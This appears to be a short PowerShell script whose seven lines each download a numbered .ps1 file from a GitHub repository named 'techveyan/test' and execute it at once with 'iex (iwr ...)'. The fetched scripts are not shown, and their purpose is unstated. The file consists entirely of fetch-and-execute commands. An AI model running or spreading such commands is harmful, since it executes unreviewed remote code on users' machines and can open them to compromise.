iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/1.ps1)
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/2.ps1)
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/3.ps1)
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/4.ps1)
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/5.ps1)
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/6.ps1)
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/techveyan/test/main/7.ps1)
